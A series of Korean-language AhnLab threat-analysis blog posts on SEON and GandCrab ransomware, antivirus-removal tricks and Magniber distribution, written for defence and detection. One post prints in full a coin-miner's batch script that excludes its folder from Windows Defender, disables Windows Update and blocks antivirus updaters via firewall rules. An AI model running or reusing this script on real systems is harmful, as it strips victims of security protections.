안랩 ASEC은 Powershell로 동작하는 SEON 랜섬웨어를 발견하였다. 해당 방식은 7월에 발견된 "파워쉘 스크립트를 이용한 GandCrab 랜섬웨어의 유포 "(http://asec.ahnlab.com/1141)와 동일하게 파일리스(Fileless)로 동작한다.


Greenflash Sundown Exploit Kit 을 통해 악성 스크립트가 동작하면서 SEON 랜섬웨어가 실행된다. [그림 1]과 같이 악성 스크립트는 Base64 와 Gzip으로 내부 스크립트가 한번 더 암호화 되어있다.


[그림 1] 악성 스크립트


내부 스크립트를 풀면 [그림 2]와 같이 디코딩 루틴(rc4)과 파일을 다운로드 받는 URL을 확인 할 수 있다.


[그림 2] 그림 1 을 복호화 한 스크립트 일부


다운로드를 받은 인코딩 된 바이너리가 풀리면 Shell Code + SEON 랜섬웨어임을 알 수 있다.


[그림 3] 인코딩 된 Binary 

[그림 4] 디코딩 된 Binary (Shellcode 와 PE)


암호화가 되면 확장자는 .FIXT로 변경되고, YOUR_FILES_ARE_ENCRYPTED.TXT 파일을 생성한다.


[그림 5] 암호화 된 파일


[그림 6] YOUR_FILES_ARE_ENCRYPTED 내용


실제로 Powershell 형태로 동작하여 메모리에서만 동작하고 파일로 생성되지 않아 사용자의 주의가 필요하다. 신뢰할 수 없는 사이트 접근은 자제하며 OS 보안 업데이트 및 Anti-Virus제품 최신 업데이트를 통해 감염 예방을 해야한다.


V3제품에서는 아래와 같이 진단하고 있다.


SEON RANSOMWARE : Malware/Gen.Generic (2018.10.25.00

Malware Script : Powershell/Seoncrypt (2018.11.16.00)

Encrypted Binary: BinImage/EncPE (2018.11.16.00)

행위탐지 : Malware/MDP.Ransom.M1996

Posted by 분석팀

주말 사이 GandCrab 제작자는 Bitdefender의 복구 툴을 우회하기 위하여 v5.0.4를 배포하였다. 금일 수집된 v5.0.4로 복구 시도 시 다음과 같이 실패하게 된다.


[그림-1] GandCrab v5.0.4감염 시스템 복구 실패 화면


또한 V3 Lite제품에 대한 삭제 행위도 자사 행위 탐지 우회를 위해 기존과 다른 방식으로 변경되었다.


[그림-2] V3 Lite 언인스톨 관련 코드(GandCrab v5.0.4)


행위 주체를 WMIC.exe에서 cscript.exe로 변경하였으며 [그림-2]의 코드가 실행 시 아래와 같은 프로세스 구조로 실행된다.


[그림-3] 언인스톨 행위 관련 프로세스 구조


여전히 사용자의 검색어 관련된 제목의 압축파일을 다운로드 유도 후 실행 방식으로 유포되고 있는 점은 이전 버전과 다르지 않다.


[그림-4] 금일(10/29) 오전 GandCrab 유포 방식


랜섬노트도 유포 방식과 같이 v5.0.3에서 명시된 버전만 v5.0.4로 변경되었을 뿐 차이점은 없다.


[그림-5] GandCrab v5.0.4 랜섬노트


내부 바이너리도 버전은 변경되었으나 자사 관련 문구는 여전히 존재한다.


[그림-6] 바이너리 내부 버전 및 AhnLab 관련 문구


안랩은 다음과 GandCrab이 실행될 경우 아래와 같이 차단하고 있다.


[그림-7] V3 GandCrab 랜섬웨어 행위차단( M.1171), V3 삭제 행위차단( M.2015)


국내를 타겟으로 활발히 유포되고 있는 GandCrab v5.0.4버전부터는 공개된 복구 툴로 정상적인 복구가 되지 않기 때문에 사용자의 확인되지 않은 다운로드는 지양하여야 하며, OS 보안 업데이트 및 Anti-Virus제품 최신 업데이트를 통해 감염 예방이 필요하다.

V3 제품에서는 아래와 같이 GandCrab에 대하여 진단하고 있다.


- JS/GandCrab.S1

- JS/GandCrab.S2

- JS/Downloader

- Trojan/Win32.Gandcrab

- Malware/MDP.Ransom.M1171

- Malware/MDP.KillAV.M2015

 


Posted by 분석팀

어제인 1025Bitdefender에서 GandCrab 버전 1, 4, 5에 대한 복구툴을 배포하였다. 해당 복구 툴은 아래 Bitdefender 페이지에서 다운로드 할 수 있으며, 자사에서 확인한 결과 지역에 상관없이 위 버전으로 암호화 된 모든 파일이 정상적으로 복구될 수 있음을 확인하였다. (국내 사용자에게도 유효)


-  https://labs.bitdefender.com/2018/10/bitdefender-law-enforcement-solve-for-multiple-versions-of-gandcrab-with-new-decryptor/


자사에서 이전에 GandCrab의 암호화 방식을 설명하였던 게시글의 내용처럼 GandCrab 버전 4, 5는 랜섬노트 내부에는 파일 복구를 위한 핵심 키인 로컬 개인키를 암호화 한 Salsa 키, 벡터 쌍이 존재한다. 다만 이 쌍이 공격자의 공개키로 암호화되어있고, 공격자 개인키는 공격자만이 알고 있기 때문에 복구가 불가능했다.



[그림1] - GandCrab 버전 4, 5 암호화 방식



따라서 Bitdefender에서 공개한 복구툴은 [그림2]의 3번처럼 랜섬노트가 존재하지 않으면 복구가 불가능 하다는 Fail문구를 나타내고, 피해 시스템의 랜섬노트 내용을 확인하여 Bitdefender 서버와 연결하여 검증 작업을 거친 후 검증 성공시 복구를 진행한다. 따라서 [그림2]의 2번처럼 네트워크가 비활성화 된 시스템에서는 복구를 진행 할 수 없다. 


[그림2] - Bitdefender 복구툴 



Bitdefender에서는 공격자의 개인키를 확보한 것으로 보이며 아래 Bitdefender의 설명과 같이 루마니아 경찰과 FBI의 지원을 받은 것으로 확인된다


[그림3] - GandCrab 복구툴 관련 글 일부 (Bitdefender)



이제는 시리아 뿐 아니라 모든 지역의 GandCrab 버전 1, 4, 5로 암호화 된 파일은 복구가 가능해진 것이다. 다만 반드시 랜섬노트([암호화된 확장자]-DECRYPT.txt)가 필요하기 때문에 암호화가 되었을 시 랜섬노트를 삭제하지 않아야 한다. 


그 동안 수시로 변경되는 양상을 보였던 V3 Lite 제품에 대한 Uninstall 기능에 대한 행위변화가 10월 18일 이후부터 확인되지 않고 있으며, GandCrab에 대한 국내 감염자 수도 감소하는 추세이다. 제작자에 대한 수사기관의 추적, 복구툴 배포 등과 관련이 있을 것으로 추정된다.


Posted by 분석팀

지난 1017일 컴퓨터 보안 및 기술 관련 정보를 제공하는 해외 리소스 사이트 Bleeping Computer에서 시리아 희생자를 위해 GandCrab 제작자가 키를 공개하였다는 기사를 업로드하였다.


https://www.bleepingcomputer.com/news/security/gandcrab-devs-release-decryption-keys-for-syrian-victims/


자사 블로그(http://asec.ahnlab.com/1153)에서 언급하였듯이 GandCrab에 암호화 된 파일들은 공격자의 개인키를 알아야 복호화를 진행 할 수 있으며, [그림1]처럼 공격자는 파일 복호화를 위해 지불한 피해 사용자에게 자신만이 알고 있는 키 쌍을 통해 사용자의 개인키를 제공하여 복호화를 진행 할 수 있도록 한다. 또한 이 키는 시스템마다 다르게 생성되기 때문에 한 피해 사용자에게 공격자로부터 제공받은 키를 알고있다 할지라도 다른 시스템에서 암호화 된 파일들은 복호화가 불가하다.



[그림1] - 공격자로 부터 제공되는 로컬 개인키



공격자가 어떤 기준으로 키 관리를 하고 있는지는 알 수 없지만, GandCrab 기능상 피해 시스템의 IP정보를 전송하는 기능이 존재하기 때문에 공격자가 IP를 정보를 토대로 시리아 지역의 키를 따로 분류할 수 있다는 추측이 가능하다. 해당 키 리스트를 통해 매칭이 되는 시리아 지역의 암호화 된 파일은 복호화가 가능하지만 수 많은 다른 지역들의 키 쌍과는 다르기 때문에 역시 GandCrab의 복호화는 아직까지 공격자에게 키를 받지 않는 이상 불가능한 현실이다.


따라서 GandCrab은 사전 방지가 중요하며 이를 위해 자사에서는 GandCrab 유포단에서의 행위진단과 생성되는 파일진단 모두 적용하여 감염을 방지하고 있다.



Posted by 분석팀

현재 자바스크립트 형태(*.js) 로 국내에 유포 중인 GandCrab v5.0.3 에서는 V3 제품 제거와 관련하여 행위 변화가 지속적으로 빠르게 진행 되고 있다. 금일 확인된 형태에서는 %temp%\AhnUn000.tmp 경로에 파일을 복사 한 후 "AhnUn000.tmp -UC" 를 실행하여 제품을 삭제하는 방법이 사용되고 있다.

 


[그림-1] V3Lite 언인스톨 관련 코드 (GandCrab v5.0.3)

 

 

기존에는 -Uninstall 인자 값을 사용하여 삭제하는 형태로 유포 되었지만, 금일 확인된 형태에선 기존 포스팅(*참고: http://asec.ahnlab.com/1169)된 방식에서 -Uninstall 인자값을 더이상 사용하지 않고, -UC 인자 값만 사용한 형태로 확인 되었다.

 

[그림-1]의 코드가 동작했을 때 보여지는 프로세스 구조는 다음과 같다.



[그림-2] 언인스톨 행위 관련 프로세스 구조

 

자사에서는 이러한 행위 변화와 관련하여 아래와 같이 행위기반의 차단을 통해 언인스톨되지 않도록 한다.

 


[그림-3] 행위 탐지

 

V3 제품에서 파일 기반의 진단은 다음과 같다.

- JS/GandCrab.S1

- JS/GandCrab.S2

- Win-Trojan/Gandcrab09.Exp


Posted by 분석팀

안랩 ASECGandCrab의 새로운 버전인 v5.0.3이 유포되고 있는 정황을 포착하였다유포되고 있는 자바스크립트 형태(*.js)는 변경되지 않았으며, V3 제품 제거 명령어도 어제 포스팅(*참고: http://asec.ahnlab.com/1169)과 같다.


[그림-1] V3 Lite 언인스톨 관련 코드(GandCrab v5.0.3)


[그림-2] GandCrab v5.0.3 감염 배경화면


상기 그림과 같이 감염 시 변경된 바탕화면에는 v5.0.3 버전이 명시되어 있다.


[그림-3] GandCrab V5.0.3 랜섬노트


랜섬노트는 업데이트 된 버전뿐만 아니라 어떤 경우에도 해당 파일에 대하여 삭제하지 말라는 경고 문구가 추가되었다.

 

[그림-4] GandCrab 내부 버전


내부 버전도 5.0.3으로 업데이트 되었으나, 기능상으로는 v5.0.2와 큰 차이는 없는 것으로 보인다.


[그림-5] V3 Lite 삭제 행위 탐지 화면


GandCrab v5.0.3이 실행되기 전, V3 Lite에 대하여 삭제 행위에 대하여 상기 그림과 같이 차단되어 동작하지 못하며, GandCrab이 실행되더라도 랜섬웨어의 파일 감염 행위로 Malware/MDP.Ransom.M1947로 행위기반 차단되고 있다.


V3 제품에서 파일 기반의 진단은 다음과 같다.


- JS/GandCrab

- JS/GandCrab.S1

- JS/GandCrab.S2

- Trojan/Win32.Gandcrab


Posted by 분석팀

현재 자바스크립트 형태(*.js)로 국내에 유포 중인 GandCrab v5.0.2 에서는 V3 제품 제거와 관련하여 행위 변화가 빠르게 진행되고 있다. 금일 확인된 형태에서는 "Uninst.exe -Uninstall"를 이용한 제거와 함께 "AhnUn000.tmp -UC"를 통한 방식 2가지를 함께 사용하고 있다.


[그림-1] V3Lite 언인스톨 관련코드 (GandCrab v5.0.2)



현재까지 확인된 V3 Lite 언인스톨 행위 대상 프로세스의 변화는 다음과 같다.

- wmic.exe -> cmd.exe -> runas.exe


[그림-1]에서의 2가지 방식 모두가 동작했을 때 보여지는 프로세스 구조는 다음과 같다.


[그림-2] 언인스톨 행위관련 프로세스 구조


자사에서는 이러한 행위변화와 관련하여 아래와 같이 행위기반의 차단을 통해 언인스톨되지 않도록 한다.




V3제품에서 파일기반의 진단은 다음과 같다.


- JS/GandCrab.S1

- JS/GandCrab.S2

- Trojan/Win32.Gandcrab





Posted by 분석팀

암호화폐 채굴 목적의 악성코드에서 실행하는 배치파일(*.bat)에 의해 안랩의 V3 Lite와 Safe Transaction 제품 등 다양한 백신 제품들에 대한 업데이트를 무력화하는 형태가 확인되었다. 


배치파일의 내용은 다음과 같다. 'Windows Defender' 및 '윈도우 업데이트 서비스', '백신제품 업데이트 프로세스'를 방화벽 차단 리스트에 등록하여 업데이트를 무력화한다. (인바운드, 아웃바운드 모두 차단)


@echo off

powershell -Command "&Add-MpPreference -ExclusionPath ""%appdata%\Windows Defender"""

wscript.exe "%appdata%\Windows Defender\dwge0E7M515s6FzFXS8pkbX9I5M6Nv.vbs"

timeout /t 30

net stop wuauserv

sc config wuauserv start= disabled


%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="OpenVPN1.0" dir=in action=block program="C:\Program Files\AhnLab\V3Lite30\MUpdate2\MUpdate2.exe"

%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="OpenVPN1.0" dir=out action=block program="C:\Program Files\AhnLab\V3Lite30\MUpdate2\MUpdate2.exe"


%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="OpenVPN2.0" dir=in action=block program="C:\Program Files\ESTsoft\ALYac\AYUpdSrv.aye"

%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="OpenVPN2.0" dir=out action=block program="C:\Program Files\ESTsoft\ALYac\AYUpdSrv.aye"


%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="Torrentservice" dir=in action=block program="C:\Program Files\Naver\NaverVaccine\NvcAgent.npc"

%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="Torrentservice" dir=out action=block program="C:\Program Files\Naver\NaverVaccine\NvcAgent.npc"


%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="Msn Messenger" dir=in action=block program="C:\Program Files\AVAST Software\Avast\setup\instup.exe"

%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="Msn Messenger" dir=out action=block program="C:\Program Files\AVAST Software\Avast\setup\instup.exe"


%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="Skype updater" dir=in action=block program="C:\Program Files\AhnLab\Safe Transaction\MUpdate2\MUpdate2.exe"

%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="Skype updater" dir=out action=block program="C:\Program Files\AhnLab\Safe Transaction\MUpdate2\MUpdate2.exe"


%WINDIR%\system32\NetSh.exe Advfirewall set allprofiles state on

schtasks /create /xml "%appdata%\Windows Defender\7MV98fc27hVbvWmBM43veOE8Lk0uY2.xml" /tn "Windows Local Network Service"  


해당 배치파일 실행 시, V3Lite 제품의 경우 아래와 같이 업데이트 오류창이 발생한다. 정상적인 인터넷 사용이 가능한 환경에서 아래와 같은 창이 발생하면 해당 악성코드에 의한 방화벽 차단을 의심해볼 필요가 있다.




악성코드에 의해 방화벽 차단으로 등록되었는지 여부는 윈도우 버튼클릭 후 '프로그램 및 파일 검색'에서 "wf.msc"를 실행하여 보여지는 아래의 프로그램을 통해 확인할 수 있다. 배치파일에서 안랩 V3Lite와 Safe Transaction 제품과 관련해서는 각각 'OpenVPN1.0'과 'Skype updater' 이름으로 등록하였음으로 해당 항목의 값이 아래와 같이 인바운드, 아웃바운드 모두 차단된 것을 알 수 있다.





V3 제품에서는 이러한 행위 시도와 관련하여 아래와 같이 사전에 행위진단을 통해 방어하고 있다.



미 감염되어 이러한 증상이 확인된 경우에는 아래의 링크에서 제공하는 Ahnlab 전용백신(Registry Fix Tool)을 통해 방화벽 허용 조치 후, 백신을 업데이트 하면 된다.


전용백신 URL: https://www.ahnlab.com/kr/site/download/product/productVaccineList.do


이러한 악성코드에 대해 V3에서 다음과 같이 진단하고 있다.


- Trojan/Win32.Agent (2018.09.12.00)

- BAT/AVKill.S1 (2018.09.14.03)

- Malware/MDP.behavior.M2008



Posted by 분석팀

한글윈도우 사용자만 감염한 Magniber 랜섬웨어


2017년 10월 국내에 유포되기 시작한 매그니베르(Magniber) 랜섬웨어는 한글 윈도우 사용자만을 타깃으로 동작하여 이슈가 되었다. 



[출처]: https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/



자사는 2018년 4월에 ASEC블로그를 통해 Magniber 랜섬웨어 확장자 별 복구툴을 배포하였고, 파일리스(Fileless) 형태의 유포방식에 대한 행위기반 탐지기능이 강화되면서 7월 16일 부터는 한국이 아닌 다른 아시아 국가로 감염대상이 확대되었다.


[출처]: https://blog.malwarebytes.com/threat-analysis/2018/07/magniber-ransomware-improves-expands-within-asia/



Magniber 에서 GandCrab으로의 전환


국내에서 멀버타이징 기법을 통한 랜섬웨어 유포지를 모니터링 하는 과정에서 올 4월 11일 부터는 Magniber 에서 GandCrab 으로 랜섬웨어가 바뀐 사실을 ASEC블로그를 통해 공개하였다.  (참고: http://asec.ahnlab.com/1128)


GandCrab은 악성코드 내부에 국내 사용자만을 타깃으로 제작한 부분이 없으며, 글로벌하게 감염피해로 인해 이슈가 되는 상황이다. 현재 국내에서도 이력서, 정상 설치파일 위장 등 사회공학적 기법을 통한 유포 및 취약점(Rig, GrandSoft)을 통한 전파가 활발하게 진행되고 있다. 현재 다양한 GandCrab 유포방식 중, 국내 감염 피해가 많은 방식은 구글(Google)을 통한 폰트, 유틸, 설치파일 검색 시 상단에 노출되는 (공격자 제작)웹 페이지를 통한 다운로드 형태이다. (참고: http://asec.ahnlab.com/1166)



국내 IP만 다르게 유포되는 GandCrab


구글 검색 페이지를 통해 GandCrab 다운로드 유도하는 웹 사이트 중 한 곳을 대상으로 국내 IP로 접속했을 때와 해외 IP의 경우에 서로 다른 형식의 파일이 다운로드 됨을 확인하였다. 국내 IP로 접속한 경우에는 ZIP 압축파일(내부에 자바스크립트 포함) 형식으로 다운로드되며, 해외 IP의 경우에는 EXE 형식으로 다운로드되고 있다. 자바스크립트 코드에서는 내부에 암호화된 GandCrab(EXE파일)을 생성 및 실행하는 기능 외에 V3Lite, AVAST, Windows Defender, Microsoft Security Client 를 제거하는 기능이 존재한다. 이러한 백신제품에 대한 무력화 시도는 GandCrab 랜섬웨어 자체에는 존재하지 않는 것으로 제작자에 의해 국내 사용자만을 타깃으로 별도로 수행되는 기능임을 알 수 이다.


[그림-1] EXE 형태로 다운로드 (국외 IP)



[그림-2] 압축파일 내부 JS 형태로 다운로드 (국내 IP)


2018년 국내에 이슈가 되고있는 Magniber, GandCrab 2가지 랜섬웨어 사례를 볼 때, 랜섬웨어 제작자에게 한국이 주요한 공격대상이 되고 있음을 알 수 있다. 이는 상대적으로 인터넷 사용자가 많은 상황 및 해외에 비해 무수히 많은 지불대행업체들이 존재하여 일반 사용자로 하여금 쉽게 비트코인 형태의 비용을 지불할 수 있는 환경 등이 원인으로 추정된다. 이번 GandCrab 유포 시 국내 IP 사용자의 경우만 백신 무력화 기능이 존재하는 것이 확인된 상황에서 안랩은 지속적인 모니터링을 통해 국내 사용자의 감염피해를 예방하고자 한다.


Posted by 분석팀

구글(Google) 검색을 통해 폰트, 유틸, 다양한 설치파일 다운로드 검색 시 노출되는 웹 페이지를 이용한 GandCrab 유포 모니터링 중 새로운 v5.0.2 버전이 확인되었다. 아래의 [그림-1]은  "유튜브 프리웨어 download" 키워드로 구글 검색 시 최상단에 위치하는 페이지를 나타낸다.


[그림-1] 구글 검색 페이지에 노출된 유포 사이트


아래의 [그림-2]는 유포 사이트에 접속하여, 다운로드 링크 클릭 시 ZIP 형식의 압축파일(유튜브_다운로드.zip)이 다운로드됨을 알 수 있다. 아래 사이트는 최초 접속시에만 보여지는 화면이며, 재 접속시에는 다른 페이지로 전환되는 것을 볼 때, 제작자에 의해 의도된 현상으로 추정된다.


[그림-2] 다운로드 받은 ZIP 압축파일



[그림-3] 동일 사이트 재 접속 시 화면


압축파일 내부에는 GandCrab v5.0.2를 포함하는 자바스크립트 파일이 존재하며, 내부에 포함하는 랜섬웨어 내부 버전은 아래와 같이 v5.0.2 임을 확인할 수 있다.


[그림-4] 압축파일 내부의 자바스크립트 파일


[그림-5] GandCrab 내부 버전


감염 시 변경되는 확장자는 v5.0.1과 동일하게 랜덤하게 바뀌며, 아래의 [그림-6]는 암호화 후 사용자에게 보여지는 랜섬노트를 나타낸다.


[그림-6] GandCrab v5.0.2 랜섬노트


해당 자바스크립트 내부에는 여전히 V3 Lite 제품에 대한 언인스톨 기능이 존재하며, 실행방식에서의 변화가 확인되었다. 기존에 실행했던 제품 설치경로가 아닌 %temp% 경로에 "uninst.exe" 파일을 (사용자 컴퓨터 이름으로 파일명 변경 후)복사하여 실행하는 방식을 사용하였다. 자바스크립트에서 수행하는 안티바이러스 제품에 대한 무력화 시도는 AVAST와 안랩 2개의 제품에 대해서만 이루어지고 있다. 최초 안랩만을 타겟으로 유포되다가 AVAST가 추가된 형태로 볼 때, 국내 사용자들이 주로 사용하는 제품을 타겟으로 공격이 이루어지는 것으로 추정된다.


[그림-7] uninst.exe 실행방식의 변화


V3제품에서는 아래와 같이 V3Lite 제거행위에 대해 행위차단을 수행하고 있으며, 파일에 대한 진단도 가능하다.


- JS/GandCrab.S1 (2018.10.02.03)

- JS/GandCrab.S2 (2018.10.02.03)

- Trojan/Win32.GandCrab (2018.10.02.04) 

- Malware/MDP.KillAV.M2016



[그림-8] V3 Lite 삭제 행위 차단

Posted by 분석팀